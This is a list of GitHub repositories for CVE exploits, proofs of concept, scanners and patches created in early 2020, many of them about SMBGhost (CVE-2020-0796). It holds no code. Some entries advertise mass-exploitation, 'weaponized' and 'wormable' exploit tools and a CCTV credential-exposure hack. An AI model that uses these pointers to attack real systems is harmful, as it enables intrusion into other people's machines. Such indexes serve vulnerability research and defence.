**no description** : [quarkslab/CVE-2020-0069_poc](https://github.com/quarkslab/CVE-2020-0069_poc) create time: 2020-03-24T13:10:39Z

**Privilege escalation in Andy emulator** : [seqred-s-a/cve-2019-14326](https://github.com/seqred-s-a/cve-2019-14326) create time: 2020-03-24T10:31:23Z

**Workaround for CVE-2020-10663 (vulnerability in json gem)** : [rails-lts/json_cve_2020_10663](https://github.com/rails-lts/json_cve_2020_10663) create time: 2020-03-24T09:53:23Z

**Patch CVE-2020-5267 for Rails 4 and Rails 3** : [GUI/legacy-rails-CVE-2020-5267-patch](https://github.com/GUI/legacy-rails-CVE-2020-5267-patch) create time: 2020-03-23T16:16:39Z

**CVE-2017-12636|exploit Couchdb** : [RedTeamWing/CVE-2017-12636](https://github.com/RedTeamWing/CVE-2017-12636) create time: 2020-03-23T10:11:04Z

**CVE-2020-10673** : [0nise/CVE-2020-10673](https://github.com/0nise/CVE-2020-10673) create time: 2020-03-23T09:10:54Z

**no description** : [c0d3G33k/Safari-Video-Permission-Spoof-CVE-2020-9781](https://github.com/c0d3G33k/Safari-Video-Permission-Spoof-CVE-2020-9781) create time: 2020-03-21T21:26:50Z

**DoS PoC for CVE-2020-0796 (SMBGhost)** : [cory-zajicek/CVE-2020-0796-DoS](https://github.com/cory-zajicek/CVE-2020-0796-DoS) create time: 2020-03-21T18:17:10Z

**PoC of CVE** : [ChoKyuWon/CVE-2019-13720](https://github.com/ChoKyuWon/CVE-2019-13720) create time: 2020-03-21T16:21:16Z

**CVE-2020-10239: Incorrect Access Control in com_fields SQL field-RCE- PoC** : [HoangKien1020/CVE-2020-10239](https://github.com/HoangKien1020/CVE-2020-10239) create time: 2020-03-21T08:40:40Z

**批量检测幽灵猫漏洞** : [Just1ceP4rtn3r/CVE-2020-1938-Tool](https://github.com/Just1ceP4rtn3r/CVE-2020-1938-Tool) create time: 2020-03-20T09:29:18Z

**Analysis of job sectors in past recessions** : [striblab/20200322-cvecon](https://github.com/striblab/20200322-cvecon) create time: 2020-03-19T20:08:37Z

**Vulnerability scanner for CVE-2020-0688** : [cert-lv/CVE-2020-0688](https://github.com/cert-lv/CVE-2020-0688) create time: 2020-03-19T16:39:56Z

**no description** : [mhamed366/CVE-2018-6574](https://github.com/mhamed366/CVE-2018-6574) create time: 2020-03-19T15:09:11Z

**Lightweight PoC and Scanner for CVE-2020-0796 without authentication.** : [5l1v3r1/CVE-2020-0796-PoC-and-Scan](https://github.com/5l1v3r1/CVE-2020-0796-PoC-and-Scan) create time: 2020-03-18T20:21:25Z

**CVE-2020-0796.SMBGhost_Crash_Poc** : [5l1v3r1/SMBGhost_Crash_Poc](https://github.com/5l1v3r1/SMBGhost_Crash_Poc) create time: 2020-03-18T20:21:01Z

**no description** : [5l1v3r1/CVE-2020-0799](https://github.com/5l1v3r1/CVE-2020-0799) create time: 2020-03-18T20:20:23Z

**An experimental script PoC for Kr00k vulnerability (CVE-2019-15126)** : [akabe1/kr00ker](https://github.com/akabe1/kr00ker) create time: 2020-03-18T16:25:28Z

**no description** : [kernelkill/cve2020-0796](https://github.com/kernelkill/cve2020-0796) create time: 2020-03-18T13:28:49Z

**Exploiter la vulnérabilité CVE-2020-0796, Remote Code Execution du protocole SMB 3.1.1 (SMBv3).** : [bonesg/CVE-2020-0797](https://github.com/bonesg/CVE-2020-0797) create time: 2020-03-17T14:16:54Z

**Scanner CVE-2019-0708** : [JSec1337/Scanner-CVE-2019-0708](https://github.com/JSec1337/Scanner-CVE-2019-0708) create time: 2020-03-17T05:05:14Z

**no description** : [yitingfan/CVE-2018-6574_demo](https://github.com/yitingfan/CVE-2018-6574_demo) create time: 2020-03-16T20:13:47Z

**Tesla Model 3 Hack DoS Entire Touchscreen Interface CVE-2020-10558** : [nuzzl/CVE-2020-10558](https://github.com/nuzzl/CVE-2020-10558) create time: 2020-03-16T16:55:18Z

**Scanner for CVE-2020-0796** : [julixsalas/CVE-2020-0796](https://github.com/julixsalas/CVE-2020-0796) create time: 2020-03-16T15:39:22Z

**CVE-2020-0796_CoronaBlue_SMBGhost** : [sujitawake/smbghost](https://github.com/sujitawake/smbghost) create time: 2020-03-16T15:31:52Z

**CVE-2019-13086漏洞的复现以及poc实验代码** : [lingchuL/CVE_POC_test](https://github.com/lingchuL/CVE_POC_test) create time: 2020-03-16T06:34:40Z

**no description** : [rhbb/CVE-2019-13956](https://github.com/rhbb/CVE-2019-13956) create time: 2020-03-16T01:43:04Z

**Lightweight PoC and Scanner for CVE-2020-0796 without authentication.** : [ran-sama/CVE-2020-0796](https://github.com/ran-sama/CVE-2020-0796) create time: 2020-03-16T00:47:41Z

**WiFiRanger 7.0.8rc3 Incorrect Access Control - Privilege Escalation** : [Luct0r/CVE-2018-17873](https://github.com/Luct0r/CVE-2018-17873) create time: 2020-03-16T00:44:28Z

**An unauthenticated PoC for CVE-2020-0796** : [maxpl0it/Unauthenticated-CVE-2020-0796-PoC](https://github.com/maxpl0it/Unauthenticated-CVE-2020-0796-PoC) create time: 2020-03-15T22:17:50Z

**CVE-2020-0796-Scanner** : [jiansiting/CVE-2020-0796-Scanner](https://github.com/jiansiting/CVE-2020-0796-Scanner) create time: 2020-03-15T03:17:47Z

**基于asyncio(协程)的CVE-2020-0796 速度还是十分可观的,方便运维师傅们对内网做下快速检测。** : [GuoKerS/aioScan_CVE-2020-0796](https://github.com/GuoKerS/aioScan_CVE-2020-0796) create time: 2020-03-14T23:39:25Z

**no description** : [ericzhong2010/GUI-Check-CVE-2020-0976](https://github.com/ericzhong2010/GUI-Check-CVE-2020-0976) create time: 2020-03-14T07:59:28Z

**CVE-2020-0796 Python POC buffer overflow** : [wsfengfan/CVE-2020-0796](https://github.com/wsfengfan/CVE-2020-0796) create time: 2020-03-14T05:39:37Z

**Advanced scanner for CVE-2020-0796 - SMBv3 RCE** : [w1ld3r/SMBGhost_Scanner](https://github.com/w1ld3r/SMBGhost_Scanner) create time: 2020-03-14T02:07:16Z

**Little scanner to know if a machine is runnig SMBv3 (possible vulnerability CVE-2020-0796)** : [BinaryShadow94/SMBv3.1.1-scan---CVE-2020-0796](https://github.com/BinaryShadow94/SMBv3.1.1-scan---CVE-2020-0796) create time: 2020-03-13T19:27:30Z

**no description** : [plorinquer/cve-2020-0796](https://github.com/plorinquer/cve-2020-0796) create time: 2020-03-13T16:08:46Z

**PoC exploit for the CVE-2019-15126 kr00k vulnerability** : [hexway/r00kie-kr00kie](https://github.com/hexway/r00kie-kr00kie) create time: 2020-03-13T14:53:54Z

**A POC remote buffer overflow for CVE-2003-0264 - SLMail 5.5** : [pwncone/CVE-2003-0264-SLmail-5.5](https://github.com/pwncone/CVE-2003-0264-SLmail-5.5) create time: 2020-03-13T13:27:56Z

**CVE-2020-0796 SMBGhost** : [marcinguy/CVE-2020-0796](https://github.com/marcinguy/CVE-2020-0796) create time: 2020-03-13T12:18:13Z

**no description** : [shadowsock5/ShardingSphere_CVE-2020-1947](https://github.com/shadowsock5/ShardingSphere_CVE-2020-1947) create time: 2020-03-13T09:47:33Z

**CVE-2020-0796 - Working PoC - 20200313** : [vysecurity/CVE-2020-0796](https://github.com/vysecurity/CVE-2020-0796) create time: 2020-03-13T08:34:31Z

**no description** : [qq1515406085/CVE-2019-19356](https://github.com/qq1515406085/CVE-2019-19356) create time: 2020-03-13T08:22:36Z

**Microsoft SMV3.1.1 wormable Exploit** : [TinToSer/cve2020-0796](https://github.com/TinToSer/cve2020-0796) create time: 2020-03-13T06:58:59Z

**Multithreaded Scanner for CVE-2020-0796 - SMBv3 RCE** : [IAreKyleW00t/SMBGhosts](https://github.com/IAreKyleW00t/SMBGhosts) create time: 2020-03-12T23:55:39Z

**This script will apply the workaround for the vulnerability CVE-2020-0796 for the SMBv3 unauthenticated RCE** : [Almorabea/SMBGhost-WorkaroundApplier](https://github.com/Almorabea/SMBGhost-WorkaroundApplier) create time: 2020-03-12T20:41:30Z

**Multithread SMB scanner to check CVE-2020-0796 for SMB v3.11** : [gabimarti/SMBScanner](https://github.com/gabimarti/SMBScanner) create time: 2020-03-12T20:07:44Z

**SMBv3 RCE vulnerability in SMBv3** : [laolisafe/CVE-2020-0796](https://github.com/laolisafe/CVE-2020-0796) create time: 2020-03-12T19:46:25Z

**Scanner for CVE-2020-0796 - A SMBv3.1.1 + SMB compression RCE** : [ioncodes/SMBGhost](https://github.com/ioncodes/SMBGhost) create time: 2020-03-12T19:33:18Z

**Scanner script to identify hosts vulnerable to CVE-2020-0796** : [wneessen/SMBCompScan](https://github.com/wneessen/SMBCompScan) create time: 2020-03-12T19:22:36Z

**PoC for triggering buffer overflow via CVE-2020-0796** : [eerykitty/CVE-2020-0796-PoC](https://github.com/eerykitty/CVE-2020-0796-PoC) create time: 2020-03-12T18:34:40Z

**SMBGhost (CVE-2020-0796) threaded scanner** : [netscylla/SMBGhost](https://github.com/netscylla/SMBGhost) create time: 2020-03-12T18:03:45Z

**Check system is vulnerable CVE-2020-0796 (SMB v3)** : [UraSecTeam/smbee](https://github.com/UraSecTeam/smbee) create time: 2020-03-12T17:32:56Z

**Scanners List - Microsoft Windows SMBv3 Remote Code Execution Vulnerability (CVE-2020-0796)** : [Dhoomralochana/Scanners-for-CVE-2020-0796-Testing](https://github.com/Dhoomralochana/Scanners-for-CVE-2020-0796-Testing) create time: 2020-03-12T16:39:41Z

**no description** : [Maskhe/rmi_cve20173241](https://github.com/Maskhe/rmi_cve20173241) create time: 2020-03-12T10:37:20Z

**Labelgrup Fixer for CVE-2020-5250 vulnerability** : [drkbcn/lblfixer_cve2020_5250](https://github.com/drkbcn/lblfixer_cve2020_5250) create time: 2020-03-11T19:04:14Z

**NSE scripts to detect CVE-2020-1350 SIGRED and CVE-2020-0796 SMBGHOST, CVE-2021-21972** : [psc4re/NSE-scripts](https://github.com/psc4re/NSE-scripts) create time: 2020-03-11T17:51:29Z

**CVE2020-0796 SMBv3 RCE** : [claroty/CVE2020-0796](https://github.com/claroty/CVE2020-0796) create time: 2020-03-11T16:37:10Z

**Proof of concept for CVE-2017-6640 as burp extension** : [hemp3l/CVE-2017-6640-POC](https://github.com/hemp3l/CVE-2017-6640-POC) create time: 2020-03-11T15:32:44Z

**Scanner for CVE-2020-0796 - SMBv3 RCE** : [ollypwn/SMBGhost](https://github.com/ollypwn/SMBGhost) create time: 2020-03-11T15:21:27Z

**Unquoted Service Path exploit in FortiClient (CVE-2019-17658)** : [Ibonok/CVE-2019-17658](https://github.com/Ibonok/CVE-2019-17658) create time: 2020-03-11T11:58:24Z

**Powershell SMBv3 Compression checker** : [T13nn3s/CVE-2020-0796](https://github.com/T13nn3s/CVE-2020-0796) create time: 2020-03-11T09:13:48Z

**CVE-2019-1458 Windows LPE Exploit** : [unamer/CVE-2019-1458](https://github.com/unamer/CVE-2019-1458) create time: 2020-03-11T08:30:14Z

**Authentication Bypass in Server Code for LibSSH** : [youkergav/CVE-2018-10933](https://github.com/youkergav/CVE-2018-10933) create time: 2020-03-11T03:04:45Z

**Weaponized PoC for SMBv3 TCP codec/compression vulnerability** : [Aekras1a/CVE-2020-0796-PoC](https://github.com/Aekras1a/CVE-2020-0796-PoC) create time: 2020-03-10T21:40:57Z

**no description** : [LucidUnicorn/CVE-2020-10560-Key-Recovery](https://github.com/LucidUnicorn/CVE-2020-10560-Key-Recovery) create time: 2020-03-10T12:55:06Z

**PoC of CVE-2019-15126 kr00k vulnerability** : [0x13enny/kr00k](https://github.com/0x13enny/kr00k) create time: 2020-03-09T11:15:08Z

**sudo exploit for CVE-2019-18634** : [ptef/CVE-2019-18634](https://github.com/ptef/CVE-2019-18634) create time: 2020-03-09T03:05:57Z

**Analysing https://nvd.nist.gov/feeds/json/cve/1.1/nvdcve-1.1-2019.json.zip** : [manankalra/NVD](https://github.com/manankalra/NVD) create time: 2020-03-08T14:33:55Z

**Gather a list of Citrix appliances in a country / state pair, and check if they're vulnerable to CVE-2019-19781** : [nmanzi/webcvescanner](https://github.com/nmanzi/webcvescanner) create time: 2020-03-08T10:42:20Z

**no description** : [dpmdpm2/CVE-2019-19905](https://github.com/dpmdpm2/CVE-2019-19905) create time: 2020-03-07T20:23:04Z

**CVE-2020-2555** : [0nise/CVE-2020-2555](https://github.com/0nise/CVE-2020-2555) create time: 2020-03-07T12:02:26Z

**The data set was provided by https://nvd.nist.gov/feeds/json/cve/1.1/nvdcve-1.1-2019.json.zip. The dataset was in json format i had to flatten it first.There were inner records again.I have flattened the file based on the sample given in the mail. Data set was about cyber security vulnarabilities.National vulnarabilities database is the product of the US NIST.NVD provides all the information regarding vulnarabilities.The main features i researched were about CWE codes,CVSS base score. cwe codes refers to The Common Weakness Enumeration Specification (CWE) provides a common language of discourse for discussing, finding and dealing with the causes of software security vulnerabilities as they are found in code, design, or system architecture. Each individual CWE represents a single vulnerability type. CWE is currently maintained by the MITRE Corporation with support from the National Cyber Security Division (DHS). A detailed CWE list is currently available at the MITRE website; this list provides a detailed definition for each individual CWE.[used from NVD website] Later, NIST provides common measure to analyse the effect of vulnarability called CVSS base score.I have taken this feature to measure the severity of the vulnarability with respect to cwe codes The data preparation and EDA is pretty straight forward.This problem looks like unsupervised learning because there were no class lables i thought to just cluster the cwe codes based on severity i.e base score,hence i used k means clustering.The k means clustering can be prone to outliers but the feature base score was from 1-10 which means it is scaled up already.Hence i decided to go with k means.** : [manish1772/Machine-learning-in-Cyber-security](https://github.com/manish1772/Machine-learning-in-Cyber-security) create time: 2020-03-07T10:26:01Z

**A CVE-2019-11580 shell** : [shelld3v/CVE-2019-11580](https://github.com/shelld3v/CVE-2019-11580) create time: 2020-03-06T17:09:26Z

**no description** : [AdriVillaB/CVE-2018-6574](https://github.com/AdriVillaB/CVE-2018-6574) create time: 2020-03-06T16:17:07Z

**A CVE-2012-2688 shell** : [shelld3v/CVE-2012-2688](https://github.com/shelld3v/CVE-2012-2688) create time: 2020-03-06T16:12:39Z

**CVE-2020-2555 Python POC** : [wsfengfan/CVE-2020-2555](https://github.com/wsfengfan/CVE-2020-2555) create time: 2020-03-06T16:02:59Z

**Stored Cross Site Scripting - Oempro** : [g-rubert/CVE-2020-9461](https://github.com/g-rubert/CVE-2020-9461) create time: 2020-03-05T17:03:25Z

**Stored Cross Site Scripting - Oempro** : [g-rubert/CVE-2020-9460](https://github.com/g-rubert/CVE-2020-9460) create time: 2020-03-05T17:03:03Z

**CVE-2019-13272** : [polosec/CVE-2019-13272](https://github.com/polosec/CVE-2019-13272) create time: 2020-03-05T10:10:19Z

**no description** : [nthuong95/CVE-2018-11235](https://github.com/nthuong95/CVE-2018-11235) create time: 2020-03-05T05:43:00Z

**CVE-2020-10238: Incorrect Access Control in com_templates PoC** : [HoangKien1020/CVE-2020-10238](https://github.com/HoangKien1020/CVE-2020-10238) create time: 2020-03-05T04:23:12Z

**no description** : [nthuong95/CVE-2018-6574](https://github.com/nthuong95/CVE-2018-6574) create time: 2020-03-04T15:08:47Z

**POC for cve-2019-1458** : [piotrflorczyk/cve-2019-1458_POC](https://github.com/piotrflorczyk/cve-2019-1458_POC) create time: 2020-03-03T17:55:07Z

**no description** : [exploitblizzard/CVE-2020-0601-spoofkey](https://github.com/exploitblizzard/CVE-2020-0601-spoofkey) create time: 2020-03-03T08:49:47Z

**This repository provides a learning environment to understand how an Exim RCE exploit for CVE-2018-6789 works.** : [martinclauss/exim-rce-cve-2018-6789](https://github.com/martinclauss/exim-rce-cve-2018-6789) create time: 2020-03-02T16:53:02Z

**CVE-2020-2546,CVE-2020-2915 CVE-2020-2801 CVE-2020-2798 CVE-2020-2883 CVE-2020-2884 CVE-2020-2950 WebLogic T3 payload exploit poc python3,** : [hktalent/CVE_2020_2546](https://github.com/hktalent/CVE_2020_2546) create time: 2020-03-02T15:54:46Z

**Jackson Deserialization CVE-2017-7525 PoC** : [Dannners/jackson-deserialization-2017-7525](https://github.com/Dannners/jackson-deserialization-2017-7525) create time: 2020-03-02T00:10:09Z

**A proof of concept to exploit the reflected XSS vulnerability in the oVirt web interface (RedHat). In this PoC a VM in the oVirt IaaS environment is to be started via the victim's browser session. JS code has been kept simple due to the rush.** : [0xEmanuel/CVE-2016-3113](https://github.com/0xEmanuel/CVE-2016-3113) create time: 2020-03-01T22:17:31Z

**Exploit and detect tools for CVE-2020-0688** : [zcgonvh/CVE-2020-0688](https://github.com/zcgonvh/CVE-2020-0688) create time: 2020-03-01T12:57:32Z

**no description** : [PerimeterX/CVE-2019-18426](https://github.com/PerimeterX/CVE-2019-18426) create time: 2020-02-29T21:36:46Z

**Nostromo 1.9.6 - Remote Code Exectuion - CVE-2019-16278** : [Unam3dd/nostromo_1_9_6_rce](https://github.com/Unam3dd/nostromo_1_9_6_rce) create time: 2020-02-29T09:42:59Z

**A small python script that checks for CVE-2019-8446** : [CyberTrashPanda/CVE-2019-8446](https://github.com/CyberTrashPanda/CVE-2019-8446) create time: 2020-02-29T04:29:02Z

**A patched Arch Linux PKGBUILD to address CVE-2019-0053 (buffer overflow). Downloads and applies a (currently) unreleased patch from upstream.** : [dreamsmasher/inetutils-CVE-2019-0053-Patched-PKGBUILD](https://github.com/dreamsmasher/inetutils-CVE-2019-0053-Patched-PKGBUILD) create time: 2020-02-28T21:12:43Z

**Quick tool for checking CVE-2020-0688 on multiple hosts with a non-intrusive method.** : [onSec-fr/CVE-2020-0688-Scanner](https://github.com/onSec-fr/CVE-2020-0688-Scanner) create time: 2020-02-28T16:04:30Z

**Weblogic IIOP CVE-2020-2551** : [Y4er/CVE-2020-2551](https://github.com/Y4er/CVE-2020-2551) create time: 2020-02-28T08:46:21Z

**Exchange Scanner CVE-2020-0688** : [righter83/CVE-2020-0688](https://github.com/righter83/CVE-2020-0688) create time: 2020-02-27T23:55:04Z

**cve-2020-0688** : [Ridter/cve-2020-0688](https://github.com/Ridter/cve-2020-0688) create time: 2020-02-27T02:54:27Z

**CVE-2020-0668** : [Nan3r/CVE-2020-0668](https://github.com/Nan3r/CVE-2020-0668) create time: 2020-02-26T11:37:29Z

**CVE-2019-7482 tracking** : [b4bay/CVE-2019-7482](https://github.com/b4bay/CVE-2019-7482) create time: 2020-02-26T10:06:22Z

**Cette exploit en python va vous permettre de créer des listes de sites et les exploiter rapidement.** : [Bilelxdz/Laravel-CVE-2018-15133](https://github.com/Bilelxdz/Laravel-CVE-2018-15133) create time: 2020-02-25T18:36:13Z

**no description** : [hackarada/cve-2015-3306](https://github.com/hackarada/cve-2015-3306) create time: 2020-02-25T03:36:25Z

**CVE-2019-17564:Apache Dubbo反序列化漏洞** : [fairyming/CVE-2019-17564](https://github.com/fairyming/CVE-2019-17564) create time: 2020-02-24T07:46:36Z

**CVE-2020-2551** : [0nise/CVE-2020-2551](https://github.com/0nise/CVE-2020-2551) create time: 2020-02-24T02:36:46Z

**来源于jackson-CVE-2020-8840,需要开autotype** : [Wfzsec/FastJson1.2.62-RCE](https://github.com/Wfzsec/FastJson1.2.62-RCE) create time: 2020-02-23T03:51:40Z

**Remote Unauthenticated Heap Memory Corruption in Quick N' Easy Web Server <= 3.3.8** : [cwinfosec/CVE-2019-19943](https://github.com/cwinfosec/CVE-2019-19943) create time: 2020-02-23T01:53:00Z

**Writeup and POC for CVE-2020-0753, CVE-2020-0754 and six fixed Window DOS Vulnerabilities.** : [afang5472/CVE-2020-0753-and-CVE-2020-0754](https://github.com/afang5472/CVE-2020-0753-and-CVE-2020-0754) create time: 2020-02-22T13:53:22Z

**PoC exploit for CVE-2015-2291** : [Tare05/Intel-CVE-2015-2291](https://github.com/Tare05/Intel-CVE-2015-2291) create time: 2020-02-22T13:27:16Z

**(CVE-2015-7501)JBoss JMXInvokerServlet 反序列化漏洞** : [ianxtianxt/CVE-2015-7501](https://github.com/ianxtianxt/CVE-2015-7501) create time: 2020-02-21T05:23:08Z

**Mass Exploit CVE-2019-16759** : [psychoxploit/vbull](https://github.com/psychoxploit/vbull) create time: 2020-02-20T23:14:52Z

**Basic code for creating the Alibaba FastJson + Spring gadget chain, as used to exploit Apache Dubbo in CVE-2019-17564 - more information available at https://www.checkmarx.com/blog/apache-dubbo-unauthenticated-remote-code-execution-vulnerability** : [Dor-Tumarkin/CVE-2019-17564-FastJson-Gadget](https://github.com/Dor-Tumarkin/CVE-2019-17564-FastJson-Gadget) create time: 2020-02-20T08:28:55Z

**no description** : [joegallagher4/CVE-2018-1288-](https://github.com/joegallagher4/CVE-2018-1288-) create time: 2020-02-20T03:36:11Z

**Demo Android application for CVE-2019-9465** : [alexbakker/CVE-2019-9465](https://github.com/alexbakker/CVE-2019-9465) create time: 2020-02-19T13:57:11Z

**这篇文章将分享一个phpMyAdmin 4.8.1版本的文件包含漏洞,从配置到原理,再到漏洞复现进行讲解,更重要的是让大家了解这些真实漏洞背后的知识。基础性文章,希望对您有所帮助!** : [eastmountyxz/CVE-2018-12613-phpMyAdmin](https://github.com/eastmountyxz/CVE-2018-12613-phpMyAdmin) create time: 2020-02-19T05:41:11Z

**这篇文章将分享Windows远程桌面服务漏洞(CVE-2019-0708),并详细讲解该漏洞及防御措施。作者作为网络安全的小白,分享一些自学基础教程给大家,主要是关于安全工具和实践操作的在线笔记,希望您们喜欢。同时,更希望您能与我一起操作和进步,后续将深入学习网络安全和系统安全知识并分享相关实验。总之,希望该系列文章对博友有所帮助,写文不易,大神们不喜勿喷,谢谢!** : [eastmountyxz/CVE-2019-0708-Windows](https://github.com/eastmountyxz/CVE-2019-0708-Windows) create time: 2020-02-19T05:40:22Z

**CVE-2019-2729 Exploit Script** : [ruthlezs/CVE-2019-2729-Exploit](https://github.com/ruthlezs/CVE-2019-2729-Exploit) create time: 2020-02-19T03:49:51Z

**SonicWall CVE-2019-7482** : [singletrackseeker/CVE-2019-7482](https://github.com/singletrackseeker/CVE-2019-7482) create time: 2020-02-18T19:17:55Z

**这资源是作者复现微软签字证书漏洞CVE-2020-0601,结合相关资源及文章实现。推荐大家结合作者博客,复现了该漏洞和理解恶意软件自启动劫持原理。作为网络安全初学者,自己确实很菜,但希望坚持下去,一起加油!** : [eastmountyxz/CVE-2018-20250-WinRAR](https://github.com/eastmountyxz/CVE-2018-20250-WinRAR) create time: 2020-02-17T15:08:22Z

**CVE-2019-5096(UAF in upload handler) exploit cause Denial of Service** : [papinnon/CVE-2019-5096-GoAhead-Web-Server-Dos-Exploit](https://github.com/papinnon/CVE-2019-5096-GoAhead-Web-Server-Dos-Exploit) create time: 2020-02-17T13:44:36Z

**Android privilege escalation via an use-after-free in binder.c** : [DimitriFourny/cve-2019-2215](https://github.com/DimitriFourny/cve-2019-2215) create time: 2020-02-17T11:53:54Z

**no description** : [N0b1e6/CVE-2016-4977-POC](https://github.com/N0b1e6/CVE-2016-4977-POC) create time: 2020-02-17T09:54:50Z

**no description** : [Exploit-3389/CVE-2019-17564](https://github.com/Exploit-3389/CVE-2019-17564) create time: 2020-02-17T09:52:47Z

**Information regarding CVE-2020-9008** : [kyletimmermans/blackboard-xss](https://github.com/kyletimmermans/blackboard-xss) create time: 2020-02-17T00:07:34Z

**poc for cve-2020-0022** : [leommxj/cve-2020-0022](https://github.com/leommxj/cve-2020-0022) create time: 2020-02-15T16:55:44Z

**Hack The CCTV | DVRs; Credentials Exposed | CVE-2018-9995** : [akuhidayat/HTC](https://github.com/akuhidayat/HTC) create time: 2020-02-15T04:42:17Z

**Simple POC for CVE-2019-16394** : [SilentVoid13/Silent_CVE_2019_16394](https://github.com/SilentVoid13/Silent_CVE_2019_16394) create time: 2020-02-14T17:41:00Z

**POE code for CVE-2017-1000112 adapted to both funtion on a specific VM and Escape a Docker** : [ol0273st-s/CVE-2017-1000112-Adpated](https://github.com/ol0273st-s/CVE-2017-1000112-Adpated) create time: 2020-02-14T13:03:00Z

**User Enumeration Proof Of Concept Exploit for CVE-2019-8449** : [r0lh/CVE-2019-8449](https://github.com/r0lh/CVE-2019-8449) create time: 2020-02-14T10:33:00Z

**CVE-2019-17564 : Apache Dubbo Deserialization Remote Code Execution** : [Hu3sky/CVE-2019-17564](https://github.com/Hu3sky/CVE-2019-17564) create time: 2020-02-14T02:41:31Z

**Exploit for CVE-2019-18634** : [N1et/CVE-2019-18634](https://github.com/N1et/CVE-2019-18634) create time: 2020-02-13T11:57:38Z

**Django StringAgg SQL Injection (CVE-2020-7471)** : [secoba/DjVul_StringAgg](https://github.com/secoba/DjVul_StringAgg) create time: 2020-02-13T07:55:44Z

**CVE-2019-17564 Apache Dubbo deserialization RCE** : [Jaky5155/CVE-2019-17564](https://github.com/Jaky5155/CVE-2019-17564) create time: 2020-02-13T01:40:50Z

**BlueFrag experiments** : [marcinguy/CVE-2020-0022](https://github.com/marcinguy/CVE-2020-0022) create time: 2020-02-12T22:00:35Z

**no description** : [r00t4dm/CVE-2019-17564](https://github.com/r00t4dm/CVE-2019-17564) create time: 2020-02-12T04:55:51Z

**PostgreSQL Remote Code Executuon** : [wkjung0624/CVE-2019-9193](https://github.com/wkjung0624/CVE-2019-9193) create time: 2020-02-12T00:17:58Z

**no description** : [N0b1e6/CVE-2018-1335-Python3](https://github.com/N0b1e6/CVE-2018-1335-Python3) create time: 2020-02-11T09:19:57Z

**https://github.com/awakened1712/CVE-2019-11932** : [dashtic172/https-github.com-awakened171](https://github.com/dashtic172/https-github.com-awakened171) create time: 2020-02-11T02:00:14Z

**Proof of concept Python tool to exploit RCE in Nibbleblog <4.0.5** : [VanTekken/CVE-2015-6967](https://github.com/VanTekken/CVE-2015-6967) create time: 2020-02-10T18:10:09Z

**Python 2.7.14 race condition UAF proof-of-concept** : [tylepr96/CVE-2018-1000030](https://github.com/tylepr96/CVE-2018-1000030) create time: 2020-02-10T12:48:31Z

**CVE: 2018-15473** : [procamora/OpenSSH-Username-Enumeration](https://github.com/procamora/OpenSSH-Username-Enumeration) create time: 2020-02-09T23:51:58Z

**Containerized and deployable use of the CVE-2019-14287 vuln. View README.md for more.** : [CMNatic/Dockerized-CVE-2019-14287](https://github.com/CMNatic/Dockerized-CVE-2019-14287) create time: 2020-02-09T21:05:20Z

**My CVE-2017-8529 files** : [sfitpro/cve-2017-8529](https://github.com/sfitpro/cve-2017-8529) create time: 2020-02-09T05:46:20Z

**Exhaust WordPress <V5.0.1 resources using long passwords (CVE-2014-9016)** : [Primus27/WordPress-Long-Password-Denial-of-Service](https://github.com/Primus27/WordPress-Long-Password-Denial-of-Service) create time: 2020-02-08T15:19:42Z

**CVE-2020-8950 AMD User Experience Program Launcher from Radeon Software Privilege Escalation ( FileWrite eop)** : [sailay1996/amd_eop_poc](https://github.com/sailay1996/amd_eop_poc) create time: 2020-02-07T18:22:51Z

**Proof of Concept for CVE-2019-18634** : [saleemrashid/sudo-cve-2019-18634](https://github.com/saleemrashid/sudo-cve-2019-18634) create time: 2020-02-07T18:07:03Z

**Yetishare SQL Injection in sSortDir_0 parameter - v3.5.2 - v4.5.4. Apart from an admin being able to exploit this, it could also be used in a CSRF attack to trick an admin user into running malicious queries.** : [jra89/CVE-2019-20059](https://github.com/jra89/CVE-2019-20059) create time: 2020-02-07T17:47:03Z

**Adapted CVE-2015-8562 payload** : [xnorkl/Joomla_Payload](https://github.com/xnorkl/Joomla_Payload) create time: 2020-02-07T14:11:27Z

**A functional exploit for CVE-2019-18634, a BSS overflow in sudo's pwfeedback feature that allows for for privesc** : [Plazmaz/CVE-2019-18634](https://github.com/Plazmaz/CVE-2019-18634) create time: 2020-02-07T02:41:44Z

**Final Project for Security and Privacy CS 600.443** : [kpawar2410/CVE-2011-4862](https://github.com/kpawar2410/CVE-2011-4862) create time: 2020-02-06T09:30:45Z

**Remote code execution in Microvirt MEmu** : [seqred-s-a/cve-2019-14514](https://github.com/seqred-s-a/cve-2019-14514) create time: 2020-02-06T08:54:45Z

**Docker repository with a PoC for WP Code Snippets 2.13.3 (CVE-2020-8417)** : [vulncrate/wp-codesnippets-cve-2020-8417](https://github.com/vulncrate/wp-codesnippets-cve-2020-8417) create time: 2020-02-06T00:03:14Z

**Improper Access Control in Tata Sonata Smartband** : [the-girl-who-lived/CVE-2020-11539](https://github.com/the-girl-who-lived/CVE-2020-11539) create time: 2020-02-05T12:19:19Z

**CVE-2019-5736 implemented in a self-written container runtime to understand the exploit.** : [GiverOfGifts/CVE-2019-5736-Custom-Runtime](https://github.com/GiverOfGifts/CVE-2019-5736-Custom-Runtime) create time: 2020-02-04T22:38:14Z

**CVE-2014-2630 exploit for xglance-bin** : [redtimmy/perf-exploiter](https://github.com/redtimmy/perf-exploiter) create time: 2020-02-04T16:47:44Z

**PoC code for CVE-2019-14041** : [tamirzb/CVE-2019-14041](https://github.com/tamirzb/CVE-2019-14041) create time: 2020-02-03T23:05:10Z

**PoC code for CVE-2019-14040** : [tamirzb/CVE-2019-14040](https://github.com/tamirzb/CVE-2019-14040) create time: 2020-02-03T23:04:49Z

**CVE-2019-8449 Exploit for Jira v2.1 - v8.3.4** : [mufeedvh/CVE-2019-8449](https://github.com/mufeedvh/CVE-2019-8449) create time: 2020-02-02T16:42:32Z

**A python implementation of CVE-2004-2271 targeting MiniShare 1.4.1.** : [pwncone/CVE-2004-2271-MiniShare-1.4.1-BOF](https://github.com/pwncone/CVE-2004-2271-MiniShare-1.4.1-BOF) create time: 2020-02-02T11:56:01Z

**CVE-2019-14314 - NextGEN Gallery 3.2.10 Authenticated SQL Injection** : [imthoe/CVE-2019-14314](https://github.com/imthoe/CVE-2019-14314) create time: 2020-01-31T09:54:06Z

**no description** : [FXTi/CVE201713287POC](https://github.com/FXTi/CVE201713287POC) create time: 2020-01-30T13:27:45Z

**Temproot for Bravia TV via CVE-2019-2215.** : [LIznzn/CVE-2019-2215](https://github.com/LIznzn/CVE-2019-2215) create time: 2020-01-30T06:06:32Z

